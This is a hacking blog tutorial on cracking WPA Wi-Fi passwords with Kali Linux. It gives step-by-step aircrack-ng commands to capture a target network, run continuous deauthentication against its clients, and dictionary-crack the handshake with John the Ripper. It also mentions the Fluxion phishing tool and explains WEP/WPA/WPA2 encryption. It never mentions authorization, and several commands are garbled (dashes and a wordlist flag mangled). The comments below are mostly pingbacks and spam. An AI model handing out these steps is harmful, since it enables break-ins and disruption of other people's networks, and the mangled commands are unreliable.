How To Hack Wifi Using Kali Linux?

How WPA Works

Most Asking Question On Google Is How to Hack Wifi Using Kali Linux , Hack wifi , How To Hack Wifi Using Kali Linux , etc. But Firstly Understand What is Wifi & its Encryption.

What is Wi-Fi and Is It Possible To Hack It?

Wi-Fi is the name of a popular wireless networking technology that uses radio waves to provide wireless high-speed Internet and Network connections. A common misconception is that the term Wi-Fi is short for “wireless fidelity,” however this is not the case. Wi-Fi is simply a trademarked phrase that means IEEE 802.11x.

How To Hack Instagram Account

When there we talk about wifi hacking from any device the security of that wifi matters most. So when we try to hack wifi it is very easy to crack or hack the password of WPS available system. WPS is one of the types of Encryption, which is used to secure the wifi network, so let start with quick tutorial.

Tools Used To Hack WiFi Password In Kali-Linux

Mainly we use kali Linux inbuilt toolset to hack wifi password which is the followings:

  • airmon-ng
  • aireplay-ng
  • airodump-ng
  • hccap
  • john the ripper
  • aircrack-ng


This script can be used to enable monitor mode on wireless interfaces. It may also be used to go back from monitor mode to managed mode. Entering the airmon-ng command without parameters will show the interfaces status.

usage: airmon-ng <start|stop> <interface> [channel] or airmon-ng <check|check kill>


Aireplay-ng is used to inject frames.

The primary function is to generate traffic for the later use in aircrack-ng for cracking the WEP and WPA-PSK keys. There are different attacks which can cause deauthentications for the purpose of capturing WPA handshake data, fake authentications, Interactive packet replay, hand-crafted ARP request injection and ARP-request reinjection. With the packetforge-ng tool it’s possible to create arbitrary frames.

Most drivers needs to be patched to be able to inject.


Airodump-ng is used for packet capturing of raw 802.11 frames and is particularly suitable for collecting WEP IVs (Initialization Vector) for the intent of using them with aircrack-ng. If you have a GPS receiver connected to the computer, airodump-ng is capable of logging the coordinates of the found access points.

Additionally, airodump-ng writes out several files containing the details of all access points and clients seen.


To convert aircrack-ng capture hashes into .hccapx we use this command.

John The Ripper

To crack the password we use the john the ripper in the final one stage. we use this tool to compare the hashes with the password dictionary. There are many other ways but we will try one of them.


Aircrack-ng is a complete suite of tools to assess WiFi network security.

It focuses on different areas of WiFi security:

  • Monitoring: Packet capture and export of data to text files for further processing by third party tools
  • Attacking: Replay attacks, deauthentication, fake access points and others via packet injection
  • Testing: Checking WiFi cards and driver capabilities (capture and injection)
  • Cracking: WEP and WPA PSK (WPA 1 and 2)

Steps To Hack WiFi Using Kali-Linux or With Any Other Debian Linux OS.

All commands with description are given above check that if you got any problem.

Step 1 :

First, take your network card into monitor mode to monitor the surrounding networks.

#airmon-ng start wlan1


#airodump-ng wlan1mon


Step 2:

#airodump-ng –bssid 2C:55:D3:B1:35:0C -c 1 -w kalip300 wlan1mon


Step 3:

#aireplay-ng -0 0 -a 2C:55:D3:B1:35:0C wlan1mon


After we capture sucsessfully handshak file we see something like this.


Step 4:

#aircrack-ng kalip300-01.cap -j john


Step 5:

#hccap2john john.hccap > wpa

Step 6:

#john –wordlist*/root/Desktop/rockyou.txt /root/Desktop/wpa

And we sucsessfully hack the wifi password by kali linux

Wifi Hacking Tool :- Fluxion

Fluxion is a security auditing and social-engineering research tool. It is a remake of linset by vk496 with (hopefully) fewer bugs and more functionality. The script attempts to retrieve the WPA/WPA2 key from a target access point by means of a social engineering (phishing) attack. It’s compatible with the latest release of Kali (rolling). Fluxion’s attacks’ setup is mostly manual, but experimental auto-mode handles some of the attacks’ setup parameters. Read the FAQ before requesting issues.

Wireless Encryption

WEP Encryption

Wired Equivalent Privacy (WEP) is an IEEE 802.11 wireless protocol which provides security algorithms for data confidentiality during wireless transmissions.

WEP uses a 24-bit Initialization vector(IV) to form stream cipher RC4 For confidentiality, and the CRC-32 checksum for intergrity of wireless transmission.

How WEP Works

  1. CRC-32 checksum is used to calculate a 32-bit Integrity Check Value (ICV) for the data, which, in turn, is added to the data frame.

2. A 24-bit arbitrary number known as Initialization Vector (IV) is added to WEP key; WEP key and IV are together called as WEP seed.

3. The WEP seed is used as the input to RC4 algorithm to generate a key stream (key stream is bit-wise XOred with the combination of data and ICV to produce the encrypted data).

4. The IV field (IV+PAD+KID) is added to the ciphertext to generate MAC Frame

How WEP Works

WPA Encryption

Wi-Fi Protected Access (WPA) is a data encryption method for WLAN’s Based on 802.11 standards.

It is a snapshot of 802.11i (under development) providing stronger encryption, and enabling PSK for EAP authentication.

How WPA Works

Temporal encryption key, transmit address, and TKIP sequence counter (TSC) is used as input to RC4 Algorithm to generate keystram.

MAC Service Data Unit (MSDU) and message intergrity check (MIC) are combined using Michael algorithm.

The Combination of MSDU and MIC is fragmented to generate MAC Protocol Data Unit (MPDU).

A 32-bit Integrity Check Value (ICV) is calculated for the MPDU

The combination of MPDU and ICV is bitwise XORed with Keysteam To Produce the encrypted data

The IV is added to the encrypted data to generate MAC frame.

WPA 2 Encryption

WPA 2 provides enterprise and WI-FI user with stronger data protection and network access control

Provides government grade security by implementing the National Institute of Standards and Technology (NIST) FIPS 140-2 compliant AES encryption algorithm.

WPA2 – Personal

WPA2 – Personal uses a set-up password (pre-shared Key) to protect unauthorized network access.

In PSK mode each wireless network device encrypts the network traffic using a 128-bit key that is derived from a passphrase of 8 to 63 ASCII characters.

WPA2 – Enterprise

It includes EAP or RADIUS for centralized client authentication using multiple authentication methods, such as token cards, Kerberos, certificates etc.

Users are assigned login credentials by a centralized server which they must present when connecting to the network.

How WPA2 Works

In the CCMP implemention of WPA2, Mac header data is used to build additonal authentication data (AAD).

A sequenced packet number (PN) is used to build nonce.

AAD, temporal key and nonce along with CCMP are used for data encryption.

A WPA2 MAC Frame is build using MAC header, CCMP header, encrypted data and encrypted MIC

How WPA2 Works

You May Missed How To Hack Phone

If You Like this Blog Please Comment Down For More Hacking Blog Click Here

Related posts

34 Thoughts to “How To Hack Wifi Using Kali Linux?”

  1. […] Also Read: How to hack wifi using kali linux […]

  2. […] Also Read: How to hack wifi using kali linux […]

  3. […] Also Read: How to hack wifi using kali linux […]

  4. […] Also Read: How to hack wifi using kali linux […]

  5. […] Also Read: How to hack wifi using kali linux […]

  6. […] Also Read: How to hack wifi using kali linux […]

  7. […] Public Wi-Fi Unencrypted Wi-Fi and Bluetooth networks are another easy way for an attacker to intercept the communication and reveal information. User connected to public Wi-Fi intentionally or unintentionally may be a victim. BlueBugging, BlueSnarfing and Packet Sniffing are the common attacks on open wireless connection. […]

  8. uvjmikoyre – Amoxicillin Without Prescription Amoxicillin 500mg Dosage

  9. […] Also Read: How to hack wifi using kali […]

  10. […] Read This :- How to Hack WiFi , Mobile Attack […]

  11. […] Read This:- How To Hack Wi-Fi with Kali Linux , What is […]

  12. […] Also Read This:- How To Hack Wi-Fi with Kali Linux […]

  13. I was able to find good information from your articles.

  14. What i do not realize is in reality how you’re no
    longer actually a lot more smartly-appreciated than you might
    be right now. You are very intelligent.
    You understand thus significantly relating to this topic, produced me in my view consider it from
    a lot of varied angles. Its like women and men aren’t involved until it is one thing
    to accomplish with Woman gaga! Your personal
    stuffs outstanding. At all times maintain it up!

  15. Currently it looks like BlogEngine is the preferred blogging platform out there right now.

    (from what I’ve read) Is that what you’re using on your blog?

  16. […] Also Read: How to hack wifi using kali linux […]

Leave a Comment